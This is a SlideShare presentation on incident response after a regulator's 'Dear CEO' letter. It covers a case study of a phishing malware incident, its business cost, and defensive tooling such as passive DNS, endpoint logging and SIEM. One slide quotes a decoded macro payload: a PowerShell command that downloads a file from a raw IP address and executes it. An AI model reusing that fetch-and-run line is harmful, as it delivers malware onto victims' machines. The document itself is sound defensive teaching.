SlideShare a Scribd company logo

Incident Response in the wake of Dear CEO

Download as PPTX, PDF
Paul Dutot IEng MIET MBCS CITP OSCP CSTM, profile picture
Paul Dutot IEng MIET MBCS CITP OSCP CSTM

The document discusses the responsibilities of registered persons regarding cyber security, emphasizing the need for effective incident response strategies and preparation against potential cyber threats. It outlines a series of key questions for incident response and lessons learned from a specific malware attack incident, highlighting the importance of logging, timely detection, and remediation. Furthermore, it suggests improvements in response mechanisms, including the use of passive DNS, endpoint logging, and integration of security information and event management (SIEM) tools.

Technology
1 of 23
Downloaded 17 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Up your Game In the wake of Dear CEO
Who am I • Security Team Lead @ Logicalis Jersey • Incorporated Engineer (IEng) / Chartered IT professional (CITP) • Channel Island s Information Security Forum (CIISF) founder • Secretary British Computer Society Jersey • My role is a mixture of offense and defence for clients of all sizes and verticals including forensic malware investigations.
How we got here “We expect that registered persons will take appropriate steps to properly manage their cyber security arrangements” cyber-security arrangements” The Boards of Directors (or equivalent) of registered persons will take overall responsibility for ensuring that their firm adequately addresses cyber security risks A registered person should: • Understand (and document) the risk of a cyber-attack on their business … • Have in place appropriate contingency arrangements that they can deploy in the event of a cyber attack • Review these matters and test their effectiveness
5 Key Questions – Incident Response [1] Can we determine how many hosts and when they talked to the bad domain? How far can we go back in time to check /prove this? [2] What information do we have available to us? Logs? Endpoint protection system? [3] Did any of the affected hosts communicate with other network system. If they did, what occurred? [4] How long did it take us to detect and remedy the incident [5] What was the cost to the business?
Incident Response Stages Preparation Incident IdentificationEradication Recovery Lessons Learned Without information, you cannot respond!! The more information that you have the better your response. Effective Incident response is about being able to pivot quickly and direct your response accordingly.
Meet Calculon Inc. 300 100 90 Cayman = 50 BVI = 50 Time = - 5 hours Jersey = 180 Guernsey =100 London = 20 HK = 40 Kuala Lumpur = 30 Shanghai = 20 Time = +8 hours
Preparation - Threat Model Threat Vulnerability Impact Business Impact Controls Email Phishing Social Engineering Possible Compromise System rebuild Logging Anti Virus Malvertising Attack Outdated Adobe Flash Possible Compromise System rebuild Ad Blocker Anti Virus Web Attack against culculon.com Vulnerability in web application stack Website compromised Reputational Loss Keep website stack up to date DDOS against Culculon.com Insufficient bandwidth Website not available Minor reputational loss Consider DDOS protection
Preparation - Cyber kill chain “You only have to be fooled once, be slow in reacting, just once. How are you going to be sure to never make a mistake? You cant plan for that. That’s Life”
2016 2016Day 1 2 3 4 5 6 7 Phishing email received 11/11/2016 System cleanup started 11/11/2016 Systems cleanup completed 11/14/2016 11/11/2016 Identify Infected systems 11/11/2016 Delete Citrix users profiles 11/11/2016 Disconnect infected systems from network 11/11/2016 - 11/14/2016 Rebuild infected systems 11/11/2016 Delete email from Exchange server 11/11/2016 Inform BVI/Cayman of the attack 11/14/2016 - 11/16/2016Reporting 11/17/2016Cost of incident Incident – Malware Attack
Incident – Malware attack It has code hidden in Excel spreadsheet When decoded it becomes….. cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63. 88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%JIOiodf hioIH.cab'); expand %TEMP%JIOiodfhioIH.cab %TEMP%JIOiodfhioIH.exe; start %TEMP%JIOiodfhioIH.exe; VBA macro virus with hidden URL
Incident – Lessons Learned [1] Insufficent logging available [2] “Triage” took too long [4] Volatile Forensic data lost [3] Lack of support skills in outside UK locations [5] USB / DLP / Drive Encryption made analysis difficult [6] AV showed no infection / Incident response tools showed no malicious processes [7] Reporting took too long
Incident 1 – Business Cost 25 who clicked email phish Citrix = 12 Various Locations Jersey, Guernsey and London KL Calculon partner HK Calculon senior executive 12 x Citrix Users - £150 per hour – 6 Hours = £3,600 9 x Citrix Users - £200 per hour – 10 Hours = £18,000 4 x Citrix Users - £400 per hour – 5 Hours = £8,000 IT support Costs = £2,000 Total Cost = £31,600
Improving Our Response – Passive DNS https://blog.redcanary.com/2015/07/02/passive-dns-monitoring-your-ir-team-needs-it/ [1] Cheap to setup [2] Use ‘Bro’ with Intel Critical Stack https://nullsecure.org/building-your-own-passivedns-feed/ [3] Solves Question 1
Endpoint Logging [1] Level One • User logins / logoff events • User Account creation, deletion and modification [2] Level Two • Process creation / termination on systems • Use of sensitive privileges [3] Must Have • Logs must be stored centrally – avoids anti forensics clearing of logs • Available for historic querying and hunting of suspicious activity
Endpoint Forensics [1] Directly examine the memory • Not susceptible to malware tampering. • More information available – malware can’t hide. [2] Scalability • We need to be able to ask questions of systems remotely. • Allows us to pivot and focus on what needs to “get done” in an incident. [3] Memory Samples • Contain information as well as disk artefacts. • Existing “Live IR” tools are insufficient. Threat Hunting = Endpoint Logging + Forensics + Netflow
ELK Stack Explained
ELK Demo
Google Rapid Response Cross-platform support for Linux, Mac OS X and Windows clients. Live remote memory analysis and imaging Powerful search and download capabilities for files and the Windows registry. Secure communication infrastructure designed for Internet deployment. Detailed monitoring of client CPU, memory, IO usage and self-imposed limits https://github.com/google/grr
Reporting / Compliance https://github.com/certsocietegenerale/FIR Python / Django Web Application Open sourced by Societe Generale Incident Response Team Customisable and freely available to you to record your incidents in. GPL V3 licensed – You can make change for your own use.
Canaries, Tokens and Honey Hashes Canary Token: Something you put on your network, if opened you get an email alert Canary Device: A honeypot with an internet console that pretends to mimic something else that creates alerts when accessed. Honey Hash: A fake NTLM password hash that you put in critical servers to detect Pass The Hash attacks.
Integrating SIEM into your response Endpoint logging and forensics integrated via event collectors Threat intelligence feeds directly integrated into SIEM AV / Next gen AV supported Passive DNS integrated
Bridging the skills gap Forensic Images: http://www.forensicfocus.com/images-and-challenges Volatility Framework: http://volatility-labs.blogspot.com/ Incident Response: http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
Questions Can your organisation prevent, detect and respond to cyber security threats that you face? In an incident could you answer the five key questions? @cyberkryption

More Related Content

PPTX
Incident Response
primeteacher32
 
PPTX
The Six Stages of Incident Response - Auscert 2016
Ashley Deuble
 
ODP
Incident response
Jarno Niemela
 
DOC
Importance Of Structured Incident Response Process
Anton Chuvakin
 
PPT
FIRST 2006 Full-day Tutorial on Logs for Incident Response
Anton Chuvakin
 
PPTX
SANS Ask the Expert: An Incident Response Playbook: From Monitoring to Opera...
AlienVault
 
PDF
Enterprise Vulnerability Management: Back to Basics
Damon Small
 
PPTX
Vulnerability Management: What You Need to Know to Prioritize Risk
AlienVault
 
Incident Response
primeteacher32
 
The Six Stages of Incident Response - Auscert 2016
Ashley Deuble
 
Incident response
Jarno Niemela
 
Importance Of Structured Incident Response Process
Anton Chuvakin
 
FIRST 2006 Full-day Tutorial on Logs for Incident Response
Anton Chuvakin
 
SANS Ask the Expert: An Incident Response Playbook: From Monitoring to Opera...
AlienVault
 
Enterprise Vulnerability Management: Back to Basics
Damon Small
 
Vulnerability Management: What You Need to Know to Prioritize Risk
AlienVault
 

What's hot (20)

PPT
Incident handling.final
ahmad abdelhafeez
 
PPTX
Enterprise Class Vulnerability Management Like A Boss
rbrockway
 
PPT
Planning and Deploying an Effective Vulnerability Management Program
Sasha Nunke
 
PPTX
Incident response
Anshul Gupta
 
PPTX
Effective Vulnerability Management
Vicky Ames
 
PPTX
Vulnerability Assessment
primeteacher32
 
PDF
Patch and Vulnerability Management
Marcelo Martins
 
PDF
Vulnerability Management: How to Think Like a Hacker to Reduce Risk
BeyondTrust
 
PDF
Implementing Vulnerability Management
Argyle Executive Forum
 
PDF
Vulnerability Management V0.1
TECHNOLOGY CONTROL CO.
 
PDF
OSB130 Patch Management Best Practices
Ivanti
 
PPTX
Six Steps to SIEM Success
AlienVault
 
PPT
Info Security - Vulnerability Assessment
Marcelo Silva
 
PPTX
Web Application Vulnerability Management
jpubal
 
PPTX
Vulnerability Assessment Presentation
Lionel Medina
 
PDF
Infocyte Mid-market Threat and Incident Response Report Webinar
Infocyte
 
PDF
Is Your Vulnerability Management Program Irrelevant?
Skybox Security
 
PDF
10 Steps to Building an Effective Vulnerability Management Program
BeyondTrust
 
PPT
IT Security management and risk assessment
CAS
 
PPTX
New USM v5.0 - Get Complete Security Visibility Faster & Easier Than Ever
AlienVault
 
Incident handling.final
ahmad abdelhafeez
 
Enterprise Class Vulnerability Management Like A Boss
rbrockway
 
Planning and Deploying an Effective Vulnerability Management Program
Sasha Nunke
 
Incident response
Anshul Gupta
 
Effective Vulnerability Management
Vicky Ames
 
Vulnerability Assessment
primeteacher32
 
Patch and Vulnerability Management
Marcelo Martins
 
Vulnerability Management: How to Think Like a Hacker to Reduce Risk
BeyondTrust
 
Implementing Vulnerability Management
Argyle Executive Forum
 
Vulnerability Management V0.1
TECHNOLOGY CONTROL CO.
 
OSB130 Patch Management Best Practices
Ivanti
 
Six Steps to SIEM Success
AlienVault
 
Info Security - Vulnerability Assessment
Marcelo Silva
 
Web Application Vulnerability Management
jpubal
 
Vulnerability Assessment Presentation
Lionel Medina
 
Infocyte Mid-market Threat and Incident Response Report Webinar
Infocyte
 
Is Your Vulnerability Management Program Irrelevant?
Skybox Security
 
10 Steps to Building an Effective Vulnerability Management Program
BeyondTrust
 
IT Security management and risk assessment
CAS
 
New USM v5.0 - Get Complete Security Visibility Faster & Easier Than Ever
AlienVault
 
Ad

Viewers also liked (20)

PPTX
Acts 6:1-7 ~ Organic Growth of the Early Church (pt. 1)
Laura Zielke
 
PDF
Nuvola: a tale of migration to AWS
Matteo Moretti
 
DOCX
Resume
Bailey Gaston
 
PPT
Combining sentences with the words although and despite
Emily Kissner
 
PDF
Adaptive Content Show & Tell - Austin Content
cdelk
 
PDF
Bsides Delhi Security Automation for Red and Blue Teams
Suraj Pratap
 
PDF
B2B Digital Transformation - Case Study
Divante
 
PDF
Demystifying Security Analytics: Data, Methods, Use Cases
Priyanka Aash
 
PDF
Heterogenous Persistence
Jervin Real
 
PDF
Micro Services - Small is Beautiful
Eberhard Wolff
 
PPTX
Deploying services: automation with docker and ansible
John Zaccone
 
PDF
Urban legends - PJ Hagerty - Codemotion Amsterdam 2017
Codemotion
 
PPTX
Composite çelik
Abdullah ÇELİK
 
PDF
Journey of The Connected Enterprise - Knowledge Graphs - Smart Data
Benjamin Nussbaum
 
PDF
Microservices
Salesforce Engineering
 
PDF
AWS Cost Visualizer
Institut Teknologi Bandung
 
PPTX
Failing at Scale - PNWPHP 2016
Chris Tankersley
 
ODP
Docker for PHP Developers - Madison PHP 2017
Chris Tankersley
 
PPTX
Turnkey Riak KV Cluster
Joe Olson
 
PPTX
Teaching for Peace, Renewing the Spirit - TESOL 2014
Cheryl Woelk
 
Acts 6:1-7 ~ Organic Growth of the Early Church (pt. 1)
Laura Zielke
 
Nuvola: a tale of migration to AWS
Matteo Moretti
 
Resume
Bailey Gaston
 
Combining sentences with the words although and despite
Emily Kissner
 
Adaptive Content Show & Tell - Austin Content
cdelk
 
Bsides Delhi Security Automation for Red and Blue Teams
Suraj Pratap
 
B2B Digital Transformation - Case Study
Divante
 
Demystifying Security Analytics: Data, Methods, Use Cases
Priyanka Aash
 
Heterogenous Persistence
Jervin Real
 
Micro Services - Small is Beautiful
Eberhard Wolff
 
Deploying services: automation with docker and ansible
John Zaccone
 
Urban legends - PJ Hagerty - Codemotion Amsterdam 2017
Codemotion
 
Composite çelik
Abdullah ÇELİK
 
Journey of The Connected Enterprise - Knowledge Graphs - Smart Data
Benjamin Nussbaum
 
Microservices
Salesforce Engineering
 
AWS Cost Visualizer
Institut Teknologi Bandung
 
Failing at Scale - PNWPHP 2016
Chris Tankersley
 
Docker for PHP Developers - Madison PHP 2017
Chris Tankersley
 
Turnkey Riak KV Cluster
Joe Olson
 
Teaching for Peace, Renewing the Spirit - TESOL 2014
Cheryl Woelk
 
Ad

Similar to Incident Response in the wake of Dear CEO (20)

PPTX
Cybersecurity - Sam Maccherola
TechBiz Forense Digital
 
PPTX
First Responders Course - Session 3 - Monitoring and Controlling Incident Costs
Phil Huggins FBCS CITP
 
PPTX
Cybersecurity - Jim Butterworth
TechBiz Forense Digital
 
PDF
Workshop incident response n handling-bssn 12 nop 2019-ignmantra
IGN MANTRA
 
PDF
Today's Cyber Challenges: Methodology to Secure Your Business
JoAnna Cheshire
 
PPTX
encase enterprise
Damir Delija
 
PDF
File000119
Desmond Devendran
 
PPTX
Incident Response: Validation, Containment & Forensics
Priyanka Aash
 
PDF
2019-09-11 Workshop incident response n handling honeynet Universitas Indonesia
IGN MANTRA
 
PPTX
Računalna forenzika i automatizirani odgovor na mrežne incidente
Damir Delija
 
PPTX
Encase cybersecurity alat za proaktivnu kontrolu korporativne it sigurnosti 2
Damir Delija
 
PDF
Enabling effective hunt teaming and incident response
jeffmcjunkin
 
PPT
Port of seattle security presentation david morris
Emily2014
 
DOCX
Winchester Aquarium and Pet Center Incident Response Plan
R. Curtis Roth
 
PDF
Proactive incident response
Brian Honan
 
PPTX
You Will Be Breached
Mike Saunders
 
PDF
C-Suite Snacks Webinar Series : Under Attack - Preparing Your Company in the ...
Citrin Cooperman
 
PDF
cybersecurity_alert_feb_12_2015
Paul Ferrillo
 
PPTX
Enterprise IT Security| CIO Innovation and Leadership
RedZone Technologies
 
PDF
cybersecurity-careers.pdf
RakeshKumar442494
 
Cybersecurity - Sam Maccherola
TechBiz Forense Digital
 
First Responders Course - Session 3 - Monitoring and Controlling Incident Costs
Phil Huggins FBCS CITP
 
Cybersecurity - Jim Butterworth
TechBiz Forense Digital
 
Workshop incident response n handling-bssn 12 nop 2019-ignmantra
IGN MANTRA
 
Today's Cyber Challenges: Methodology to Secure Your Business
JoAnna Cheshire
 
encase enterprise
Damir Delija
 
File000119
Desmond Devendran
 
Incident Response: Validation, Containment & Forensics
Priyanka Aash
 
2019-09-11 Workshop incident response n handling honeynet Universitas Indonesia
IGN MANTRA
 
Računalna forenzika i automatizirani odgovor na mrežne incidente
Damir Delija
 
Encase cybersecurity alat za proaktivnu kontrolu korporativne it sigurnosti 2
Damir Delija
 
Enabling effective hunt teaming and incident response
jeffmcjunkin
 
Port of seattle security presentation david morris
Emily2014
 
Winchester Aquarium and Pet Center Incident Response Plan
R. Curtis Roth
 
Proactive incident response
Brian Honan
 
You Will Be Breached
Mike Saunders
 
C-Suite Snacks Webinar Series : Under Attack - Preparing Your Company in the ...
Citrin Cooperman
 
cybersecurity_alert_feb_12_2015
Paul Ferrillo
 
Enterprise IT Security| CIO Innovation and Leadership
RedZone Technologies
 
cybersecurity-careers.pdf
RakeshKumar442494
 

More from Paul Dutot IEng MIET MBCS CITP OSCP CSTM (10)

PPTX
Welcome to the #WannaCry Wine Club
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PPTX
Scanning Channel Islands Cyberspace
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PDF
Logicalis Security Conference
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PDF
Letter anonymous-II
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
ODP
Exploiting buffer overflows
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PDF
Practical Cyber Defense
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
ODP
A Letter from Anonymous to the Jersey Finance Industry
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PDF
Infosec lecture-final
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PDF
Path to Surfdroid
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
PDF
WI-FI Security in Jersey 2011
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Welcome to the #WannaCry Wine Club
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Scanning Channel Islands Cyberspace
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Logicalis Security Conference
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Letter anonymous-II
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Exploiting buffer overflows
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Practical Cyber Defense
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
A Letter from Anonymous to the Jersey Finance Industry
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Infosec lecture-final
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
Path to Surfdroid
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 
WI-FI Security in Jersey 2011
Paul Dutot IEng MIET MBCS CITP OSCP CSTM
 

Recently uploaded (20)

PDF
Advances in Ultra High Voltage (UHV) Transmission and Distribution Systems.pdf
Nabajyoti Banik
 
PDF
AI-Cloud-Business-Management-Platforms-The-Key-to-Efficiency-Growth.pdf
Artjoker Software Development Company
 
PDF
How-Cloud-Computing-Impacts-Businesses-in-2025-and-Beyond.pdf
Artjoker Software Development Company
 
PDF
AI Unleashed - Shaping the Future -Starting Today - AIOUG Yatra 2025 - For Co...
Sandesh Rao
 
PDF
Responsible AI and AI Ethics - By Sylvester Ebhonu
Sylvester Ebhonu
 
PDF
Using Anchore and DefectDojo to Stand Up Your DevSecOps Function
Anchore
 
PDF
Get More from Fiori Automation - What’s New, What Works, and What’s Next.pdf
Precisely
 
PDF
REPORT: Heating appliances market in Poland 2024
SPIUG
 
PPTX
Dev Dives: Automate, test, and deploy in one place—with Unified Developer Exp...
AndreeaTom
 
PDF
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 
PPTX
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
PDF
A Day in the Life of Location Data - Turning Where into How.pdf
Precisely
 
PPTX
OA presentation.pptx OA presentation.pptx
pateldhruv002338
 
PDF
Automating ArcGIS Content Discovery with FME: A Real World Use Case
Safe Software
 
PDF
Brief History of Internet - Early Days of Internet
sutharharshit158
 
PDF
Doc9.....................................
SofiaCollazos
 
PPTX
cloud computing vai.pptx for the project
vaibhavdobariyal79
 
PDF
Unlocking the Future- AI Agents Meet Oracle Database 23ai - AIOUG Yatra 2025.pdf
Sandesh Rao
 
PDF
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
PDF
Orbitly Pitch Deck|A Mission-Driven Platform for Side Project Collaboration (...
zz41354899
 
Advances in Ultra High Voltage (UHV) Transmission and Distribution Systems.pdf
Nabajyoti Banik
 
AI-Cloud-Business-Management-Platforms-The-Key-to-Efficiency-Growth.pdf
Artjoker Software Development Company
 
How-Cloud-Computing-Impacts-Businesses-in-2025-and-Beyond.pdf
Artjoker Software Development Company
 
AI Unleashed - Shaping the Future -Starting Today - AIOUG Yatra 2025 - For Co...
Sandesh Rao
 
Responsible AI and AI Ethics - By Sylvester Ebhonu
Sylvester Ebhonu
 
Using Anchore and DefectDojo to Stand Up Your DevSecOps Function
Anchore
 
Get More from Fiori Automation - What’s New, What Works, and What’s Next.pdf
Precisely
 
REPORT: Heating appliances market in Poland 2024
SPIUG
 
Dev Dives: Automate, test, and deploy in one place—with Unified Developer Exp...
AndreeaTom
 
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
A Day in the Life of Location Data - Turning Where into How.pdf
Precisely
 
OA presentation.pptx OA presentation.pptx
pateldhruv002338
 
Automating ArcGIS Content Discovery with FME: A Real World Use Case
Safe Software
 
Brief History of Internet - Early Days of Internet
sutharharshit158
 
Doc9.....................................
SofiaCollazos
 
cloud computing vai.pptx for the project
vaibhavdobariyal79
 
Unlocking the Future- AI Agents Meet Oracle Database 23ai - AIOUG Yatra 2025.pdf
Sandesh Rao
 
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
Orbitly Pitch Deck|A Mission-Driven Platform for Side Project Collaboration (...
zz41354899
 

Incident Response in the wake of Dear CEO

  • 1. Up your Game In the wake of Dear CEO
  • 2. Who am I • Security Team Lead @ Logicalis Jersey • Incorporated Engineer (IEng) / Chartered IT professional (CITP) • Channel Island s Information Security Forum (CIISF) founder • Secretary British Computer Society Jersey • My role is a mixture of offense and defence for clients of all sizes and verticals including forensic malware investigations.
  • 3. How we got here “We expect that registered persons will take appropriate steps to properly manage their cyber security arrangements” cyber-security arrangements” The Boards of Directors (or equivalent) of registered persons will take overall responsibility for ensuring that their firm adequately addresses cyber security risks A registered person should: • Understand (and document) the risk of a cyber-attack on their business … • Have in place appropriate contingency arrangements that they can deploy in the event of a cyber attack • Review these matters and test their effectiveness
  • 4. 5 Key Questions – Incident Response [1] Can we determine how many hosts and when they talked to the bad domain? How far can we go back in time to check /prove this? [2] What information do we have available to us? Logs? Endpoint protection system? [3] Did any of the affected hosts communicate with other network system. If they did, what occurred? [4] How long did it take us to detect and remedy the incident [5] What was the cost to the business?
  • 5. Incident Response Stages Preparation Incident IdentificationEradication Recovery Lessons Learned Without information, you cannot respond!! The more information that you have the better your response. Effective Incident response is about being able to pivot quickly and direct your response accordingly.
  • 6. Meet Calculon Inc. 300 100 90 Cayman = 50 BVI = 50 Time = - 5 hours Jersey = 180 Guernsey =100 London = 20 HK = 40 Kuala Lumpur = 30 Shanghai = 20 Time = +8 hours
  • 7. Preparation - Threat Model Threat Vulnerability Impact Business Impact Controls Email Phishing Social Engineering Possible Compromise System rebuild Logging Anti Virus Malvertising Attack Outdated Adobe Flash Possible Compromise System rebuild Ad Blocker Anti Virus Web Attack against culculon.com Vulnerability in web application stack Website compromised Reputational Loss Keep website stack up to date DDOS against Culculon.com Insufficient bandwidth Website not available Minor reputational loss Consider DDOS protection
  • 8. Preparation - Cyber kill chain “You only have to be fooled once, be slow in reacting, just once. How are you going to be sure to never make a mistake? You cant plan for that. That’s Life”
  • 9. 2016 2016Day 1 2 3 4 5 6 7 Phishing email received 11/11/2016 System cleanup started 11/11/2016 Systems cleanup completed 11/14/2016 11/11/2016 Identify Infected systems 11/11/2016 Delete Citrix users profiles 11/11/2016 Disconnect infected systems from network 11/11/2016 - 11/14/2016 Rebuild infected systems 11/11/2016 Delete email from Exchange server 11/11/2016 Inform BVI/Cayman of the attack 11/14/2016 - 11/16/2016Reporting 11/17/2016Cost of incident Incident – Malware Attack
  • 10. Incident – Malware attack It has code hidden in Excel spreadsheet When decoded it becomes….. cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63. 88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%JIOiodf hioIH.cab'); expand %TEMP%JIOiodfhioIH.cab %TEMP%JIOiodfhioIH.exe; start %TEMP%JIOiodfhioIH.exe; VBA macro virus with hidden URL
  • 11. Incident – Lessons Learned [1] Insufficent logging available [2] “Triage” took too long [4] Volatile Forensic data lost [3] Lack of support skills in outside UK locations [5] USB / DLP / Drive Encryption made analysis difficult [6] AV showed no infection / Incident response tools showed no malicious processes [7] Reporting took too long
  • 12. Incident 1 – Business Cost 25 who clicked email phish Citrix = 12 Various Locations Jersey, Guernsey and London KL Calculon partner HK Calculon senior executive 12 x Citrix Users - £150 per hour – 6 Hours = £3,600 9 x Citrix Users - £200 per hour – 10 Hours = £18,000 4 x Citrix Users - £400 per hour – 5 Hours = £8,000 IT support Costs = £2,000 Total Cost = £31,600
  • 13. Improving Our Response – Passive DNS https://blog.redcanary.com/2015/07/02/passive-dns-monitoring-your-ir-team-needs-it/ [1] Cheap to setup [2] Use ‘Bro’ with Intel Critical Stack https://nullsecure.org/building-your-own-passivedns-feed/ [3] Solves Question 1
  • 14. Endpoint Logging [1] Level One • User logins / logoff events • User Account creation, deletion and modification [2] Level Two • Process creation / termination on systems • Use of sensitive privileges [3] Must Have • Logs must be stored centrally – avoids anti forensics clearing of logs • Available for historic querying and hunting of suspicious activity
  • 15. Endpoint Forensics [1] Directly examine the memory • Not susceptible to malware tampering. • More information available – malware can’t hide. [2] Scalability • We need to be able to ask questions of systems remotely. • Allows us to pivot and focus on what needs to “get done” in an incident. [3] Memory Samples • Contain information as well as disk artefacts. • Existing “Live IR” tools are insufficient. Threat Hunting = Endpoint Logging + Forensics + Netflow
  • 18. Google Rapid Response Cross-platform support for Linux, Mac OS X and Windows clients. Live remote memory analysis and imaging Powerful search and download capabilities for files and the Windows registry. Secure communication infrastructure designed for Internet deployment. Detailed monitoring of client CPU, memory, IO usage and self-imposed limits https://github.com/google/grr
  • 19. Reporting / Compliance https://github.com/certsocietegenerale/FIR Python / Django Web Application Open sourced by Societe Generale Incident Response Team Customisable and freely available to you to record your incidents in. GPL V3 licensed – You can make change for your own use.
  • 20. Canaries, Tokens and Honey Hashes Canary Token: Something you put on your network, if opened you get an email alert Canary Device: A honeypot with an internet console that pretends to mimic something else that creates alerts when accessed. Honey Hash: A fake NTLM password hash that you put in critical servers to detect Pass The Hash attacks.
  • 21. Integrating SIEM into your response Endpoint logging and forensics integrated via event collectors Threat intelligence feeds directly integrated into SIEM AV / Next gen AV supported Passive DNS integrated
  • 22. Bridging the skills gap Forensic Images: http://www.forensicfocus.com/images-and-challenges Volatility Framework: http://volatility-labs.blogspot.com/ Incident Response: http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
  • 23. Questions Can your organisation prevent, detect and respond to cyber security threats that you face? In an incident could you answer the five key questions? @cyberkryption